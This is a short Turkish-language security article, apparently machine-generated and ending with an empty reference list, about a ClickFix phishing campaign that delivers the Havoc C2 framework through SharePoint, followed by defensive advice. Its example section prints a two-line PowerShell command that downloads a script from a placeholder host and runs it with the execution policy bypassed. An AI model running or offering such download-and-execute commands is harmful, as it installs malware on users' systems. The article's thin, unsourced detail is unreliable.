“`html
Giriş
Son dönemde siber güvenlik uzmanları, ClickFix tekniğini kullanarak SharePoint siteleri üzerinden PowerShell tabanlı Havoc adlı açık kaynaklı komut ve kontrol (C2) framework’ünü yaymak için yeni bir phishing kampanyasının dikkat çekici unsurlarını ortaya koydu. Bu makalede, söz konusu tehdit aktörünün nasıl çalıştığına ve bu tür saldırıların güvenlik risklerine odaklanacağız.
Teknik Açıklamalar
Havoc, saldırganların uzaktan kontrol sağlamak için kullandıkları bir C2 framework’tür. ClickFix yöntemi, zararlı yazılımın her aşamasını SharePoint siteleri arkasında gizleyerek hedef sistemlerde fark edilmeden ilerlemesine olanak tanır. Bu süreçte Microsoft Graph API kullanılarak, C2 iletişimlerinin güvenilir ve tanıdık kaynaklardan geliyormuş gibi görünmesi sağlanır. Böylelikle, saldırganlar kötü amaçlı yazılımlarını gizleyebilir ve izlenmeyi azaltabilir.
Söz konusu kampanyanın temel hedefi, kullanıcıların yasal ve güvenilir bir platformda etkileşime geçmelerini sağlamak ve bu sayede zararlı yazılımın yüklenmesine zemin hazırlamaktır. Paylaşılan belgeler veya dosyalar, genellikle kullanıcıların dikkatini çekmek için sosyal mühendislik teknikleriyle hazırlanmıştır.
Örnekler
Bir örnek senaryo olarak, aşağıdaki PowerShell komut dizisi, Havoc’un yükleneceği bir SharePoint dosyasını gösterebilir:
Invoke-WebRequest -Uri "https://trusted-sharepoint-site.com/malicious-file" -OutFile "C:\path\to\downloaded-file.ps1"
powershell.exe -ExecutionPolicy Bypass -File "C:\path\to\downloaded-file.ps1"
Bu komutlar, SharePoint sitesi üzerinden zararlı dosyanın indirilmesini ve çalıştırılmasını sağlar. Kullanıcı, zararlı yazılımı yasal bir kaynaktan alıyormuş hissine kapılabilir.
Önlemler & En İyi Uygulamalar
Bu tür saldırılara karşı alınabilecek önlemler şunlardır:
- Eğitim ve Farkındalık: Kullanıcıları phishing saldırıları ve sosyal mühendislik teknikleri hakkında eğitmek, bu tür saldırıların etkisini azaltabilir.
- Güvenlik Duvarı ve Filtreleme: SharePoint gibi platformlardan gelen trafiğin izlenmesi ve zararlı içeriklerin engellenmesi, saldırıların önlenmesinde önemli bir adımdır.
- Güvenlik Güncellemeleri: Tüm sistemlerin güncel tutulması, bilinen açıkların kötüye kullanılmasını engelleyebilir.
- Çok Faktörlü Kimlik Doğrulama: Kullanıcı hesaplarına erişim kontrolü için çok faktörlü kimlik doğrulama uygulanması, yetkisiz erişim riskini azaltır.
Sonuç & Özet
SharePoint siteleri üzerinden Havoc C2’yi yaymak için kullanılan ClickFix tekniği, siber saldırganların zararlı yazılımlarını gizlemek için gelişmiş yöntemler kullandığını göstermektedir. Kullanıcıların yanıltıcı tekniklere karşı dikkatli olmaları ve siber güvenlik önlemlerini güçlendirmeleri önemlidir.
Kaynakça
Bu konuda daha fazla bilgi edinmek için aşağıdaki kaynaklara göz atabilirsiniz:
“` [Collection]
About the Author
